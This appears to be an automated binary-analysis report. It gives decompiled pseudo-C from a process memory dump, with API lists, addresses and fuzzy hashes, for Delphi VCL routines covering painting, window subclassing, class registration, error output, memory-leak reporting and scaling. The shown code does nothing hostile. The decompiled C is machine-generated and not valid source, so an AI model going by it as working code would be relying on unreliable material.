E004403A0(intOrPtr* __eax, void* __edx) { struct HDC__* _v8; struct HBITMAP__* _v12; void* _v16; struct tagPAINTSTRUCT _v80; int _v84; void* _v96; int _v104; void* _v112; void* __ebx; void* __edi; void* __esi; void* __ebp; void* _t38; struct HDC__* _t59; intOrPtr* _t88; intOrPtr _t107; void* _t108; struct HDC__* _t110; void* _t113; void* _t116; void* _t118; intOrPtr _t119; _t116 = _t118; _t119 = _t118 + 0xffffff94; _push(_t108); _t113 = __edx; _t88 = __eax; if( *((char*)(__eax + 0x240)) == 0 || *((intOrPtr*)(__edx + 4)) != 0) { if(( *(_t88 + 0x55) & 0x00000001) != 0 || E0043E7F4(_t88) != 0) { _t38 = L0043FDA8(_t88, _t88, _t113, _t108, _t113); } else { _t38 = *((intOrPtr*)( *_t88 - 0x10))(); } return _t38; } else { _t110 = GetDC(0); *((intOrPtr*)( *_t88 + 0x44))(); *((intOrPtr*)( *_t88 + 0x44))(); _v12 = CreateCompatibleBitmap(_t110, _v104, _v84); ReleaseDC(0, _t110); _v8 = CreateCompatibleDC(0); _v16 = SelectObject(_v8, _v12); *[fs:eax] = _t119; _t59 = BeginPaint(E004423F8(_t88), &_v80); E0043BC9C(_t88, _v8, 0x14, _v8); *((intOrPtr*)(_t113 + 4)) = _v8; E004403A0(_t88, _t113); *((intOrPtr*)(_t113 + 4)) = 0; *((intOrPtr*)( *_t88 + 0x44))( *[fs:eax], 0x4404f2, _t116); *((intOrPtr*)( *_t88 + 0x44))(); BitBlt(_t59, 0, 0, _v104, _v84, _v8, 0, 0, 0xcc0020); EndPaint(E004423F8(_t88), &_v80); _pop(_t107); *[fs:eax] = _t107; _push(0x4404f9); SelectObject(_v8, _v16); DeleteDC(_v8); return DeleteObject(_v12); } } 0x004403a1 0x004403a3 0x004403a8 0x004403a9 0x004403ab 0x004403b4 0x004403c0 0x004403df 0x004403cd 0x004403d3 0x004403d3 0x004404ff 0x004403e9 0x004403f0 0x004403f9 0x00440407 0x00440414 0x0044041a 0x00440426 0x00440436 0x00440444 0x00440453 0x00440468 0x00440470 0x00440477 0x0044047e 0x00440495 0x004404a3 0x004404af 0x004404c0 0x004404c7 0x004404ca 0x004404cd 0x004404da 0x004404e3 0x004404f1 0x004404f1

APIs

GetDC.USER32(00000000), ref: 004403EB CreateCompatibleBitmap.GDI32(00000000,?), ref: 0044040F ReleaseDC.USER32 ref: 0044041A CreateCompatibleDC.GDI32(00000000), ref: 00440421 SelectObject.GDI32(00000000,?), ref: 00440431 BeginPaint.USER32(00000000,?,00000000,004404F2,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00440453 BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 004404AF EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 004404C0 SelectObject.GDI32(00000000,?), ref: 004404DA DeleteDC.GDI32(00000000), ref: 004404E3 DeleteObject.GDI32(?), ref: 004404EC Part of subcall function 0043FDA8: BeginPaint.USER32(00000000,?), ref: 0043FDD3 Part of subcall function 0043FDA8: EndPaint.USER32(00000000,?,0043FF0E), ref: 0043FF01

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease String ID: API String ID: 3867285559-0 Opcode ID: eba5fdd7ba86c248c310541572c712ce7591c9252fd8a16b30174db8949f5770 Instruction ID: 4919ca747627bef7842d7ed575d7896ae0b3c9884536c9da749fdf441052b200 Opcode Fuzzy Hash: eba5fdd7ba86c248c310541572c712ce7591c9252fd8a16b30174db8949f5770 Instruction Fuzzy Hash: C1414171B00204AFDB10EFA9CD85F9EB7F8EF49704F10447ABA05EB281DA789D158B54

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00437338(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) { char _v8; void* _t29; void* _t32; void* _t38; void* _t42; void* _t46; void* _t54; intOrPtr* _t65; _t65 = &_v8; _t29 = *0x462560; // 0x0 *((intOrPtr*)(_t29 + 0x1b4)) = _a4; if(IsWindowUnicode(_a4) == 0) { _t32 = *0x462560; // 0x0 SetWindowLongA(_a4, 0xfffffffc, *(_t32 + 0x1c0)); if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) { SetWindowLongA(_a4, 0xfffffff4, _a4); } } else { _t54 = *0x462560; // 0x0 SetWindowLongW(_a4, 0xfffffffc, *(_t54 + 0x1c0)); if((GetWindowLongW(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongW(_a4, 0xfffffff4) == 0) { SetWindowLongW(_a4, 0xfffffff4, _a4); } } _t38 = *0x462560; // 0x0 SetPropA(_a4, *0x466502 & 0x0000ffff, _t38); _t42 = *0x462560; // 0x0 SetPropA(_a4, *0x466500 & 0x0000ffff, _t42); _t46 = *0x462560; // 0x0 *0x462560 = 0; _v8 = *((intOrPtr*)(_t46 + 0x1c0))(_a4, _a8, _a12, _a16); return *_t65; } 0x0043733d 0x00437340 0x00437348 0x00437359 0x004373a4 0x004373b6 0x004373cb 0x004373e6 0x004373e6 0x0043735b 0x0043735b 0x0043736d 0x00437382 0x0043739d 0x0043739d 0x00437382 0x004373eb 0x004373fd 0x00437402 0x00437414 0x00437425 0x0043742a 0x0043743a 0x00437442

APIs

IsWindowUnicode.USER32(?), ref: 00437352 SetWindowLongW.USER32 ref: 0043736D GetWindowLongW.USER32(?,000000F0), ref: 00437378 GetWindowLongW.USER32(?,000000F4), ref: 0043738A SetWindowLongW.USER32 ref: 0043739D SetWindowLongA.USER32(?,000000FC,?), ref: 004373B6 GetWindowLongA.USER32 ref: 004373C1 GetWindowLongA.USER32 ref: 004373D3 SetWindowLongA.USER32(?,000000F4,?), ref: 004373E6 SetPropA.USER32 ref: 004373FD SetPropA.USER32 ref: 00437414

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$Prop$Unicode String ID: API String ID: 1693715928-0 Opcode ID: 9cb3877dccd50f0c78dc4fa0fa98952b877eedb7963e8443561684603e94e979 Instruction ID: 055e33e178d5362de7fb404685cd59e59f5cb0b042dc790f1cdf86eecf1274db Opcode Fuzzy Hash: 9cb3877dccd50f0c78dc4fa0fa98952b877eedb7963e8443561684603e94e979 Instruction Fuzzy Hash: 62316075608248BBDF10DFA9DD84E9A37ACBB08354F104266FD14DB2E1D378EA40CB65

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%

E0043EA40(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) { char _v68; struct _WNDCLASSA _v108; intOrPtr _v116; signed char _v137; void* _v144; struct _WNDCLASSA _v184; char _v188; char _v192; char _v196; int _t52; void* _t53; intOrPtr _t86; intOrPtr _t105; intOrPtr _t109; void* _t110; intOrPtr* _t112; void* _t116; _t110 = __edi; _t94 = __ebx; _push(__ebx); _push(__esi); _v196 = 0; _t112 = __eax; _push(_t116); _push(0x43ec01); _push( *[fs:eax]); *[fs:eax] = _t116 + 0xffffff40; *((intOrPtr*)( *__eax + 0x9c))(); if(_v116 != 0 || (_v137 & 0x00000040) == 0) { L7: *((intOrPtr*)(_t112 + 0x1a8)) = _v108.lpfnWndProc; _t52 = GetClassInfoA(_v108.hInstance, &_v68, &_v184); asm("sbb eax, eax"); _t53 = _t52 + 1; if(_t53 == 0 || E00437338 != _v184.lpfnWndProc) { if(_t53 != 0) { UnregisterClassA( &_v68, _v108.hInstance); } _v108.lpfnWndProc = E00437338; _v108.lpszClassName = &_v68; if(RegisterClassA( &_v108) == 0) { E0040D764(); } } *0x462560 = _t112; _t96 = *_t112; *((intOrPtr*)( *_t112 + 0xa0))(); if( *(_t112 + 0x1b4) == 0) { E0040D764(); } if((GetWindowLongA( *(_t112 + 0x1b4), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t112 + 0x1b4), 0xfffffff4) == 0) { SetWindowLongA( *(_t112 + 0x1b4), 0xfffffff4, *(_t112 + 0x1b4)); } E0040927C( *((intOrPtr*)(_t112 + 0x64))); *((intOrPtr*)(_t112 + 0x64)) = 0; E00442700(_t112); E0043BC9C(_t112, E0042590C( *((intOrPtr*)(_t112 + 0x68)), _t94, _t96, _t110, _t112), 0x30, 1); _t131 = *((char*)(_t112 + 0x5c)); if( *((char*)(_t112 + 0x5c)) != 0) { E00403B24(_t112, _t131); } _pop(_t105); *[fs:eax] = _t105; _push(0x43ec08); return E0040473C( &_v196); } else { _t94 = *((intOrPtr*)(__eax + 4)); if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) { L6: _v192 = *((intOrPtr*)(_t112 + 8)); _v188 = 0xb; _t86 = *0x462dec; // 0x423568 E00406740(_t86, &_v196); E0040C158(_t94, _v196, 1, _t110, _t112, 0, &_v192); E00404184(); } else { _t109 = *0x4369e8; // 0x436a34 if(E00403AB4(_t94, _t109) == 0) { goto L6; } _v116 = E004423F8(_t94); } goto L7; } } 0x0043ea40 0x0043ea40 0x0043ea49 0x0043ea4a 0x0043ea4d 0x0043ea53 0x0043ea57 0x0043ea58 0x0043ea5d 0x0043ea60 0x0043ea6d 0x0043ea77 0x0043eaec 0x0043eaef 0x0043eb04 0x0043eb0c 0x0043eb0e 0x0043eb11 0x0043eb22 0x0043eb2c 0x0043eb2c 0x0043eb31 0x0043eb3b 0x0043eb4a 0x0043eb4c 0x0043eb4c 0x0043eb4a 0x0043eb51 0x0043eb5f 0x0043eb61 0x0043eb6e 0x0043eb70 0x0043eb70 0x0043eb88 0x0043eba6 0x0043eba6 0x0043ebae 0x0043ebb5 0x0043ebba 0x0043ebd2 0x0043ebd7 0x0043ebdb 0x0043ebe3 0x0043ebe3 0x0043ebea 0x0043ebed 0x0043ebf0 0x0043ec00 0x0043ea82 0x0043ea82 0x0043ea87 0x0043eaac 0x0043eaaf 0x0043eab5 0x0043eacb 0x0043ead0 0x0043eae2 0x0043eae7 0x0043ea8f 0x0043ea91 0x0043ea9e 0x00000000 0x00000000 0x0043eaa7 0x0043eaa7 0x00000000 0x0043ea87

APIs

GetClassInfoA.USER32 ref: 0043EB04 UnregisterClassA.USER32 ref: 0043EB2C RegisterClassA.USER32 ref: 0043EB42 GetWindowLongA.USER32 ref: 0043EB7E GetWindowLongA.USER32 ref: 0043EB93 SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 0043EBA6

Strings

h5B , xrefs: 0043EACB @ , xrefs: 0043EA79 4jC , xrefs: 0043EA91

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassLongWindow$InfoRegisterUnregister String ID: 4jC$@$h5B API String ID: 717780171-916785525 Opcode ID: 23814c8b448176fa15c958dc6a007fd35c890fe50a8182ec585c7e2c3e7324e2 Instruction ID: d23709e6df1bb4d3d126ec428beffe84ce2308d2414f8cb5aec67fee482d3fa9 Opcode Fuzzy Hash: 23814c8b448176fa15c958dc6a007fd35c890fe50a8182ec585c7e2c3e7324e2 Instruction Fuzzy Hash: E2518670A013449BDB21EB66CC81B9EB3E8BF48308F00456AF845E73D2DB38AD45CB59

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0040C054(void* __edx, void* __edi, void* __fp0) { void _v1024; char _v1088; long _v1092; void* _t12; char* _t14; intOrPtr _t16; intOrPtr _t18; intOrPtr _t24; long _t32; L0040BECC(_t12, &_v1024, __edx, __fp0, 0x400); _t14 = *0x462e14; // 0x46304c if( *_t14 == 0) { _t16 = *0x462b88; // 0x40762c _t9 = _t16 + 4; // 0xffec _t18 = *0x4657f8; // 0x400000 LoadStringA(E00405C64(_t18), *_t9, &_v1088, 0x40); return MessageBoxA(0, &_v1024, &_v1088, 0x2010); } _t24 = *0x462bec; // 0x46321c E00402E68(E004030B4(_t24)); CharToOemA( &_v1024, &_v1024); _t32 = E00409008( &_v1024, __edi); WriteFile(GetStdHandle(0xfffffff4), &_v1024, _t32, &_v1092, 0); return WriteFile(GetStdHandle(0xfffffff4), E0040C118, "true", &_v1092, 0); } 0x0040c063 0x0040c068 0x0040c070 0x0040c0d7 0x0040c0dc 0x0040c0e0 0x0040c0eb 0x00000000 0x0040c101 0x0040c072 0x0040c07c 0x0040c08b 0x0040c09b 0x0040c0ae 0x00000000

APIs

Part of subcall function 0040BECC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040BEE9 Part of subcall function 0040BECC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040BF0D Part of subcall function 0040BECC: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040BF28 Part of subcall function 0040BECC: LoadStringA.USER32 ref: 0040BFBE CharToOemA.USER32 ref: 0040C08B GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040C0A8 WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040C0AE GetStdHandle.KERNEL32(000000F4,0040C118,?,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040C0C3 WriteFile.KERNEL32(00000000,000000F4,0040C118,?,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040C0C9 LoadStringA.USER32 ref: 0040C0EB MessageBoxA.USER32 ref: 0040C101

Strings

,v@ , xrefs: 0040C0D7 L0F , xrefs: 0040C068

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual String ID: ,v@$L0F API String ID: 185507032-114336920 Opcode ID: 07f17ca0095baed20458b404fad0876ad00edfc715b2c3dd6b064ac9ae374d2e Instruction ID: 968c3332249ca419ab36ba5ff9e4d5e5c4f2a2f71d5e9e194e9044cb27fed959 Opcode Fuzzy Hash: 07f17ca0095baed20458b404fad0876ad00edfc715b2c3dd6b064ac9ae374d2e Instruction Fuzzy Hash: F61154B1148204BAD200EB95CC86F8B77EC9B44704F40453BB755FA1D3DAB9E94487AB

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 98%

E0040262A(void* __eax, void* __fp0) { void* _v8; char _v110600; char _v112644; char _v112645; signed int _v112652; char _v112653; char _v112654; char _v112660; intOrPtr _v112664; intOrPtr _v112668; intOrPtr _v112672; struct HWND__* _v112676; signed short* _v112680; intOrPtr* _v112684; char _v129068; char _v131117; char _v161836; void* _v162091; signed char _v162092; void* _t73; int _t79; signed int _t126; int _t131; intOrPtr _t132; char* _t134; char* _t135; char* _t136; char* _t137; char* _t138; char* _t139; char* _t141; char* _t142; char* _t147; char* _t148; intOrPtr _t179; void* _t181; void* _t183; void* _t184; intOrPtr* _t187; intOrPtr* _t188; signed int _t193; void* _t197; void* _t199; void* _t213; _t197 = _t199; _push(__eax); _t73 = 0x27; goto L2; L13: while(_t179 != 0x463708) { _t79 = E00402144(_t179); _t131 = _t79; __eflags = _t131; if(_t131 == 0) { L12: _t179 = *((intOrPtr*)(_t179 + 4)); continue; } else { goto L5; } do { L5: _t193 = *(_t131 - 4); __eflags = _t193 & 0x00000001; if((_t193 & 0x00000001) == 0) { __eflags = _t193 & 0x00000004; if(__eflags == 0) { __eflags = _v112652 - 0x1000; if(_v112652 < 0x1000) { _v112664 = (_t193 & 0xfffffff0) - 4; _t126 = E00402488(_t131, _t164); __eflags = _t126; if(_t126 == 0) { _v112645 = 0; _t164 = _v112664; *((intOrPtr*)(_t197 + _v112652 * 4 - 0x1f828)) = _v112664; _t18 = &_v112652; *_t18 = _v112652 + 1; __eflags = *_t18; } } } else { E004024E0(_t131, __eflags, _t197); } } _t79 = E00402120(_t131); _t131 = _t79; __eflags = _t131; } while (_t131 != 0); goto L12; } _t132 = *0x4657b0; // 0x4657ac while(_t132 != 0x4657ac && _v112652 < 0x1000) { _t79 = E00402488(_t132 + 0x10, _t164); __eflags = _t79; if(_t79 == 0) { _v112645 = 0; _t22 = _t132 + 0xc; // 0x0 _t79 = _v112652; *((intOrPtr*)(_t197 + _t79 * 4 - 0x1f828)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4; _t27 = &_v112652; *_t27 = _v112652 + 1; __eflags = *_t27; } _t29 = _t132 + 4; // 0x4657ac _t132 = *_t29; } if(_v112645 != 0) { L49: return _t79; } _v112653 = 0; _v112668 = 0; _t134 = E004022DC(0x28, &_v161836); _v112660 = 0x37; _v112680 = 0x46103e; _v112684 = &_v110600; do { _v112672 = ( *_v112680 & 0x0000ffff) - 4; _v112654 = 0; _t181 = 0xff; _t187 = _v112684; while(_t134 <= &_v131117) { if( *_t187 > 0) { if(_v112653 == 0) { _t134 = E004022DC(0x27, _t134); _v112653 = 1; } if(_v112654 != 0) { *_t134 = 0x2c; _t139 = _t134 + 1; *_t139 = 0x20; _t140 = _t139 + 1; __eflags = _t139 + 1; } else { *_t134 = 0xd; *((char*)(_t134 + 1)) = 0xa; _t147 = E004021C0(_v112668 + 1, _t134 + 2); *_t147 = 0x20; _t148 = _t147 + 1; *_t148 = 0x2d; *((char*)(_t148 + 1)) = 0x20; _t140 = E004022DC(8, E004021C0(_v112672, _t148 + 2)); _v112654 = 1; } _t213 = _t181 - 1; if(_t213 < 0) { _t141 = E004022DC(7, _t140); } else { if(_t213 == 0) { _t141 = E004022DC(6, _t140); } else { E00403808( *((intOrPtr*)(_t187 - 4)), &_v162092); _t141 = E004022DC(_v162092 & 0x000000ff, _t140); } } *_t141 = 0x20; _t142 = _t141 + 1; *_t142 = 0x78; *((char*)(_t142 + 1)) = 0x20; _t134 = E004021C0( *_t187, _t142 + 2); } _t181 = _t181 - 1; _t187 = _t187 - 8; if(_t181 != 0xffffffff) { continue; } else { goto L38; } } L38: _v112668 = _v112672; _v112684 = _v112684 + 0x800; _v112680 = &(_v112680[0x10]); _t60 = &_v112660; *_t60 = _v112660 - 1; } while ( *_t60 != 0); if(_v112652 <= 0) { L48: E004022DC(3, _t134); _t79 = MessageBoxA(0, &_v161836, "Unexpected Memory Leak", 0x2010); goto L49; } if(_v112653 != 0) { *_t134 = 0xd; _t136 = _t134 + 1; *_t136 = 0xa; _t137 = _t136 + 1; *_t137 = 0xd; _t138 = _t137 + 1; *_t138 = 0xa; _t134 = _t138 + 1; } _t134 = E004022DC(0x3c, _t134); _t183 = _v112652 - 1; if(_t183 >= 0) { _t184 = _t183 + 1; _v112676 = 0; _t188 = &_v129068; L44: L44: if(_v112676 != 0) { *_t134 = 0x2c; _t135 = _t134 + 1; *_t135 = 0x20; _t134 = _t135 + 1; } _t134 = E004021C0( *_t188, _t134); if(_t134 > &_v131117) { goto L48; } _v112676 = &(_v112676->i); _t188 = _t188 + 4; _t184 = _t184 - 1; if(_t184 != 0) { goto L44; } } L2: _t199 = _t199 + 0xfffff004; _push(_t73); _t73 = _t73 - 1; if(_t73 != 0) { goto L2; } else { E00403264( &_v112644, 0x1b800); _t164 = 0x4000; E00403264( &_v129068, 0x4000); _t79 = 0; _v112652 = 0; _v112645 = 1; _t179 = *0x46370c; // 0x25e0000 goto L13; } } 0x0040262d 0x0040262f 0x00402630 0x00402630 0x00000000 0x0040270b 0x0040268b 0x00402690 0x00402692 0x00402694 0x00402708 0x00402708 0x00000000 0x00000000 0x00000000 0x00000000 0x00402696 0x00402696 0x0040269b 0x0040269d 0x004026a3 0x004026a5 0x004026ab 0x004026b8 0x004026c2 0x004026ca 0x004026d2 0x004026d7 0x004026d9 0x004026db 0x004026e8 0x004026ee 0x004026f5 0x004026f5 0x004026f5 0x004026f5 0x004026d9 0x004026ad 0x004026b0 0x004026b5 0x004026ab 0x004026fd 0x00402702 0x00402704 0x00402704 0x00000000 0x00402696 0x00402717 0x00402756 0x00402724 0x00402729 0x0040272b 0x0040272d 0x00402734 0x00402740 0x00402746 0x0040274d 0x0040274d 0x0040274d 0x0040274d 0x00402753 0x00402753 0x00402753 0x00402771 0x004029cf 0x004029d5 0x004029d5 0x00402777 0x00402780 0x0040279b 0x0040279d 0x004027a7 0x004027b7 0x004027bd 0x004027c9 0x004027cf 0x004027d6 0x004027e1 0x004027e3 0x004027f4 0x00402801 0x00402814 0x00402816 0x00402816 0x00402824 0x00402875 0x00402878 0x00402879 0x0040287c 0x0040287c 0x00402826 0x00402826 0x0040282a 0x0040283c 0x0040283e 0x00402841 0x00402842 0x00402846 0x0040286a 0x0040286c 0x0040286c 0x0040287f 0x00402882 0x00402899 0x00402884 0x00402884 0x004028ae 0x00402886 0x004028bb 0x004028d4 0x004028d4 0x00402884 0x004028d6 0x004028d9 0x004028da 0x004028de 0x004028eb 0x004028eb 0x004028ed 0x004028ee 0x004028f4 0x00000000 0x00000000 0x00000000 0x00000000 0x004028f4 0x004028fa 0x00402900 0x00402906 0x00402910 0x00402917 0x00402917 0x00402917 0x0040292a 0x004029a6 0x004029b2 0x004029ca 0x00000000 0x004029ca 0x00402933 0x00402935 0x00402938 0x00402939 0x0040293c 0x0040293d 0x00402940 0x00402941 0x00402944 0x00402944 0x00402956 0x0040295e 0x00402961 0x00402963 0x00402964 0x0040296e 0x00000000 0x00402974 0x0040297b 0x0040297d 0x00402980 0x00402981 0x00402984 0x00402984 0x0040298e 0x00402998 0x00000000 0x00000000 0x0040299a 0x004029a0 0x004029a3 0x004029a4 0x00000000 0x00000000 0x004029a4 0x00402635 0x00402635 0x0040263b 0x0040263c 0x0040263d 0x00000000 0x0040263f 0x00402658 0x00402665 0x0040266a 0x0040266f 0x00402671 0x00402677 0x0040267e 0x00000000 0x0040267e

Strings

, xrefs: 00402910 An unexpected memory leak has occurred. , xrefs: 0040278C Unexpected Memory Leak , xrefs: 004029BC 7 , xrefs: 0040279D bytes: , xrefs: 00402859 The sizes of unexpected leaked medium and large blocks are: , xrefs: 00402945 The unexpected small block leaks are: , xrefs: 00402803

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak API String ID: 0-2723507874 Opcode ID: ab1744bc822241615f06664216cff9c599eaab7f23789ca155b362964788a165 Instruction ID: 232ad5794996384582659ab8687426251ae0ce960e01d4fcfe06ac857680b770 Opcode Fuzzy Hash: ab1744bc822241615f06664216cff9c599eaab7f23789ca155b362964788a165 Instruction Fuzzy Hash: E771C630B042588FDB21AA2DC988BD9B6E5EB09704F1441FBE049F73C2DBB949C5CB59

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0043A624(intOrPtr* __eax, int __ecx, int __edx) { signed int _t62; signed int _t64; signed int _t65; signed char _t109; int _t121; intOrPtr* _t122; int _t123; int* _t125; *_t125 = __ecx; _t121 = __edx; _t122 = __eax; if(__edx == *_t125) { L29: _t62 = *0x43a7e0 & 0x000000ff; *(_t122 + 0x8c) = _t62; return _t62; } if(( *(__eax + 0x1c) & 0x00000001) == 0) { _t109 = *0x43a7d8 & 0x000000ff; } else { _t109 = *(__eax + 0x8c) & 0x000000ff; } if((_t109 & 0x00000001) == 0) { _t123 = *(_t122 + 0x40); } else { _t123 = MulDiv( *(_t122 + 0x40), _t121, *_t125); } if((_t109 & 0x00000002) == 0) { _t125[1] = *(_t122 + 0x44); } else { _t125[1] = MulDiv( *(_t122 + 0x44), _t121, *_t125); } if((_t109 & 0x00000004) == 0 || ( *(_t122 + 0x51) & 0x00000001) != 0) { _t64 = *(_t122 + 0x48); _t125[2] = _t64; } else { if((_t109 & 0x00000001) == 0) { _t64 = MulDiv( *(_t122 + 0x48), _t121, *_t125); _t125[2] = _t64; } else { _t64 = MulDiv( *(_t122 + 0x40) + *(_t122 + 0x48), _t121, *_t125) - _t123; _t125[2] = _t64; } } _t65 = _t64 & 0xffffff00 | (_t109 & 0x00000008) != 0x00000000; if(_t65 == 0 || ( *(_t122 + 0x51) & 0x00000002) != 0) { _t125[3] = *(_t122 + 0x4c); } else { if(_t65 == 0) { _t125[3] = MulDiv( *(_t122 + 0x44), _t121, *_t125); } else { _t125[3] = MulDiv( *(_t122 + 0x44) + *(_t122 + 0x4c), _t121, *_t125) - _t125[1]; } } E0043A4D8(_t122, *_t125, _t121); *((intOrPtr*)( *_t122 + 0x88))(_t125[4], _t125[2]); if(( *0x43a7e0 & 0x000000ff) != (_t109 & *0x43a7dc)) { *(_t122 + 0x175) = MulDiv( *(_t122 + 0x175), _t121, *_t125); } if(( *0x43a7e0 & 0x000000ff) != (_t109 & *0x43a7e4)) { *(_t122 + 0x179) = MulDiv( *(_t122 + 0x179), _t121, *_t125); } if( *((char*)(_t122 + 0x59)) == 0 && (_t109 & 0x00000010) != 0) { E00425C2C( *((intOrPtr*)(_t122 + 0x68)), MulDiv(E00425C10( *((intOrPtr*)(_t122 + 0x68))), _t121, *_t125)); } goto L29; } 0x0043a62b 0x0043a62e 0x0043a630 0x0043a635 0x0043a7c2 0x0043a7c2 0x0043a7c9 0x0043a7d6 0x0043a7d6 0x0043a63f 0x0043a64a 0x0043a641 0x0043a641 0x0043a641 0x0043a654 0x0043a668 0x0043a656 0x0043a664 0x0043a664 0x0043a66e 0x0043a687 0x0043a670 0x0043a67e 0x0043a67e 0x0043a68e 0x0043a6c8 0x0043a6cb 0x0043a696 0x0043a699 0x0043a6bd 0x0043a6c2 0x0043a69b 0x0043a6ac 0x0043a6ae 0x0043a6ae 0x0043a699 0x0043a6d2 0x0043a6d7 0x0043a71b 0x0043a6df 0x0043a6e7 0x0043a712 0x0043a6e9 0x0043a6fe 0x0043a6fe 0x0043a6e7 0x0043a726 0x0043a73f 0x0043a756 0x0043a769 0x0043a769 0x0043a780 0x0043a793 0x0043a793 0x0043a79d 0x0043a7bd 0x0043a7bd 0x00000000

APIs

MulDiv.KERNEL32(?,?,?), ref: 0043A65F MulDiv.KERNEL32(?,?,?), ref: 0043A679 MulDiv.KERNEL32(?,?,?), ref: 0043A6A7 MulDiv.KERNEL32(?,?,?), ref: 0043A6BD MulDiv.KERNEL32(?,?,?), ref: 0043A6F5 MulDiv.KERNEL32(?,?,?), ref: 0043A70D Part of subcall function 00425C10: MulDiv.KERNEL32(00000000,00000048,?), ref: 00425C21 MulDiv.KERNEL32(?), ref: 0043A764 MulDiv.KERNEL32(?), ref: 0043A78E MulDiv.KERNEL32(00000000), ref: 0043A7B4 Part of subcall function 00425C2C: MulDiv.KERNEL32(00000000,?,00000048), ref: 00425C39

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 2325144a8e082e646bad59a138fd9ea4b37950158a0450446acd531626ff6a80 Instruction ID: 31ea7b08f01d562e4291b2201e28d04268924927301679854e288b517f7f1c2d Opcode Fuzzy Hash: 2325144a8e082e646bad59a138fd9ea4b37950158a0450446acd531626ff6a80 Instruction Fuzzy Hash: FA513370644750AFC320EB69C885E6BB7F9AF49744F08581EF5D6C7361C739E8608B1A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 39%

